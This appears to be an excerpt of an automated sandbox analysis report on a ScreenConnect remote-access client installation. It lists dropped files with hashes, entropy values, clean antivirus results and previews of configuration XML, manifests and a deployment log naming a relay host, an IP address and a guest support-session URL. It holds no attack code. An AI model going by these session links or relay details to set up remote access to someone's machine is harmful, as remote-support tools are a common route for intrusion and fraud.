                                                                                                                                                                                                                                        SHA-256:5875DC8A8B96DC0A7A437268C2E4D3DF9A32FDE08DBA45F7B13EE570EA30D8E4
                                                                                                                                                                                                                                        SHA-512:C8ECC1D70CD51E4492A5A55266CA88629D095256444AF484F7B22737D033FC51E050D70E62F0E17F5E96D4BB9BAB15A4616E7C7CDC757792153396D18A5907EF
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a09</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.027489542286802
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCD8/vXbAa3xT:2dL9hK6E46YPRNYSvH
                                                                                                                                                                                                                                        MD5:AB87C30576B82BF1519BB5C0F4C1892A
                                                                                                                                                                                                                                        SHA1:B70F1AEC9059B13FE11BCDE860326F840606519F
                                                                                                                                                                                                                                        SHA-256:B864AEFD7862D7A3481DAE9A1879A7CF3E55461D284D6E04B20374E3C38D44F1
                                                                                                                                                                                                                                        SHA-512:4328C4F32EBE5C9B55B706B7FF1E6F05D984F310626D519602EDC2C0C113F8FD79C6F13791EAD12AD3C84CDDD36402CB4F5D51A0C518483BC64CD90C8D15C9B4
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a24</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.025006993424163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDb/vXbAa3xT:2dL9hK6E46YPRNYjvH
                                                                                                                                                                                                                                        MD5:EDB2E8587D18334A40E10B09C3439CB5
                                                                                                                                                                                                                                        SHA1:00A1E535CD65A0B8B13C357D3704D5460C798B03
                                                                                                                                                                                                                                        SHA-256:2048DF39D2DCBCCD4A9E0945976BD252118365C35AA34217054C493679024AE6
                                                                                                                                                                                                                                        SHA-512:1AEA17FB24201C594812C7CC2A6BF4F3AFD2C7460B84428DB841551AD3EDB0C4540139FDBC082D1306D9EE3B7C6D376216207613D1414015BEBF9F5F636C3035
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a22</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYC5/vXbAa3xT:2dL9hK6E46YPRNYYCRvH
                                                                                                                                                                                                                                        MD5:F2B508086B50069A37A6DBA07AF6CE62
                                                                                                                                                                                                                                        SHA1:DC53B1C2AD9C9ABA41F307E6CDB547029396133B
                                                                                                                                                                                                                                        SHA-256:31E3EB97C15C09ED60CBE9E875BC72099BE8F0F6679A9F409374021B8D8A83E8
                                                                                                                                                                                                                                        SHA-512:3124968125928CC8D206E11568BD4980113175FD713F434915F56AD0FB4C49F78D2FDC46B22A3C7A10AAD39094BD6D02497C6BC76A4863DFDABBCB6035EFFDAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.0296960930001084
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDu/vXbAa3xT:2dL9hK6E46YPRNYUvH
                                                                                                                                                                                                                                        MD5:EF7E1429AE5707438C291EFC842B222C
                                                                                                                                                                                                                                        SHA1:F7F6AAE628A258AC9AC53FD51A0B3E5822C19913
                                                                                                                                                                                                                                        SHA-256:A6B3043AD46C9B5C72CC5FF476093208365E51FBE8D7BA7B5FCBCD96657B36EF
                                                                                                                                                                                                                                        SHA-512:7E80E22445E758170204985B025916FF8F519D63401376CA7DAA763D4B337C58C454A766D1A3554AF7F1CA202CE3989A7DDE1A46FCBB1254A4829395A8C21EB0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a38</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):68608
                                                                                                                                                                                                                                        Entropy (8bit):6.064454014855692
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:KQZMEtZ8j8Mk6Y6lXQiA1FBwtc5QFVIl1h5FYb8h:Vb2jbfZUFmMQFVQPh
                                                                                                                                                                                                                                        MD5:26AE3ECD5B370434E3147A4F7638E408
                                                                                                                                                                                                                                        SHA1:26684D1CFA1DBE03E00B87FE0998DBDD324B97E1
                                                                                                                                                                                                                                        SHA-256:31B75F440F94BF6831EC57DC95F2FE09B88F16FA0356F99B72B925D4308126EB
                                                                                                                                                                                                                                        SHA-512:2811A08546A79603499D146061CAB25C6ECBB9DDBEA389DECD85112009140C7B9379A5A708ABF41C9C1C37D853499218B233929EBAEC4679282B48ED9EEE51CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (645), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14862
                                                                                                                                                                                                                                        Entropy (8bit):3.806900096331163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:t6BKedd2TtFdbKBBaOy0l8dd2TtFdZVE71+/5X8gQkFOdd2TtFdu0waudPL5oIZd:Tr5KaqrhE7Ujr64LEv
                                                                                                                                                                                                                                        MD5:33F97665B53E5CF45AAF7122719E04D1
                                                                                                                                                                                                                                        SHA1:A6062A3EE7B582833299939D33287BE12BF3D0ED
                                                                                                                                                                                                                                        SHA-256:CBBDC1C077D6B21CB6599516B1B3E1CF9D1637AEB848CE950F6CABA5212CC3B0
                                                                                                                                                                                                                                        SHA-512:542F026880E1A2CE5C7C49E4A13183EEA40BF394B2E75A61661A9A9E5C83AA21FB2690FE1FD1DE6CB0E85DF0A62A56AAD68E39FF053BE06873DE6136AA0D50DF
                                                                                                                                                                                                                                        Malicious:false
Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)....SOURCES.. Deployment url : https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):118570
                                                                                                                                                                                                                                        Entropy (8bit):5.58802022381172
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q0/CcT51/FXvMVNWfCXq9ymKQm2o9HuzhJOvP:ZCcfiVIEQmt8vOvP
                                                                                                                                                                                                                                        MD5:F450107E1E082AB0A9F72C187D9CD440
                                                                                                                                                                                                                                        SHA1:DBAE33BCEA9D70C0B32E01D9BD0BFBC5AC3CD087
                                                                                                                                                                                                                                        SHA-256:B1A80158AD4B45F74C4A74F943CFF18F6888DBAE987C4C34717B6EEF9F1CF9B9
                                                                                                                                                                                                                                        SHA-512:4122737EF3F4EF05E7F1FE45DE96BC974CB153C236B9E66B62FFD71088F06D43E9E031994382378102504C0E62A262B335E6A5BF1FC29BEF566CC6233C6DBAE7
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">
  <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                        Entropy (8bit):6.586698462937567
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zxLtNGBlIyS7/OXjusqVFJRJcyzvyqSmzDvJXYz:htNGBGySaXqPJY5qSmG
                                                                                                                                                                                                                                        MD5:5F31CB0A5524DF64FEFF668D581F075E
                                                                                                                                                                                                                                        SHA1:F111EFE5C55E42BE6CE2ED9E5703E30A5D743D43
                                                                                                                                                                                                                                        SHA-256:47D471E33377DB7F96FF84B4CFCC420CF770A77219BCB0CE55446490211A5DF3
                                                                                                                                                                                                                                        SHA-512:0DEB969C51D1A7B1A8B608BD47A77940E6A88E8AAD7534800C2C2D5DFDFC298F02128C8D9742ABE3019D9EBEB5906185D6C3DD159C29749B2A903F04A28B18E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                        Entropy (8bit):5.148447070499623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AWR7vNxW57FpS+iENg49vNxW5NgMRNg49vNxWO:JdFYZ8h9onRigeP0AJvSkcyMDcVSkTo
                                                                                                                                                                                                                                        MD5:131D3A2329559EDB69DFAE83D4F7FF6F
                                                                                                                                                                                                                                        SHA1:16E303B64B7007C64A5FACC76A3876B3AD8BFC6F
                                                                                                                                                                                                                                        SHA-256:78B036CA84FBE94BC5DCFFA3F8BFB563ABBEC1E645C2053043C288A896EEE760
                                                                                                                                                                                                                                        SHA-512:7D5CAD1324B4B7275967F657648FADA1BA74A15497678F5FAF1430758ACC8B0E442D5E7EB2707AC37785480FED139D270831A54F14EB640F54F633EACC9087DB
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">
  <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />
  <file name="ScreenConnect.Client.dll" />
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />
    </dependent
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):68608
                                                                                                                                                                                                                                        Entropy (8bit):6.064454014855692
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:KQZMEtZ8j8Mk6Y6lXQiA1FBwtc5QFVIl1h5FYb8h:Vb2jbfZUFmMQFVQPh
                                                                                                                                                                                                                                        MD5:26AE3ECD5B370434E3147A4F7638E408
                                                                                                                                                                                                                                        SHA1:26684D1CFA1DBE03E00B87FE0998DBDD324B97E1
                                                                                                                                                                                                                                        SHA-256:31B75F440F94BF6831EC57DC95F2FE09B88F16FA0356F99B72B925D4308126EB
                                                                                                                                                                                                                                        SHA-512:2811A08546A79603499D146061CAB25C6ECBB9DDBEA389DECD85112009140C7B9379A5A708ABF41C9C1C37D853499218B233929EBAEC4679282B48ED9EEE51CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                        Entropy (8bit):5.085064362578612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0Ah+vSkcyMDcbEMDcuMDcVSkcf5bdTo:3FYZ8h9o9gI0AhCHMDTMD3MDGAXTo
                                                                                                                                                                                                                                        MD5:A76A11959003296D5D51977FCCA1A318
                                                                                                                                                                                                                                        SHA1:80D5EDD082ECC84E1989A425475A21084D3007B3
                                                                                                                                                                                                                                        SHA-256:6728343B086A6BDA1D771D9DAC1C894A4D26F38D3CD4DFCC1BE31D99F6C89494
                                                                                                                                                                                                                                        SHA-512:17738FDD0F29C7C6CB7EB8EF7665623ABB6E17DAB430A7840BA416BA93E7BB7D8ECC256919A57944A9A0CA52954DAFB9CCB4D192A5C1860C491E04789F86A310
                                                                                                                                                                                                                                        Malicious:false
Preview:
<?xml version="1.0" encoding="utf-8"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">
  <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />
  <file name="ScreenConnect.ClientService.dll" />
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />
    </dependentAssembly>
  </dependency>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.50477752737346
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:ig1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgsU0HMF7aw:zhbNDxZGXfdHrX7rAc6myJkgsU0H2B
                                                                                                                                                                                                                                        MD5:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        SHA1:333A207282B5127674560B2F290D890214FCFA7A
                                                                                                                                                                                                                                        SHA-256:906075E5A4CEDF4793EF18C4C8DA01B0E8798E9EEBCBC2287BA1F470CAFBDAF5
                                                                                                                                                                                                                                        SHA-512:80FDA5639D41F924C6A0C2E1D798A5433DD1C6043C6E9A03EB1CE0CEF7D75339676743E7BEF4A4C8D548B9FE293CC591822B4FEB77FCF61F84EAD4C13EDCBC6C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):549888
                                                                                                                                                                                                                                        Entropy (8bit):6.035813011819646
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:qL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquq1MSRq/sree:qLMhOeM52aBFcTbkdqRR6EX
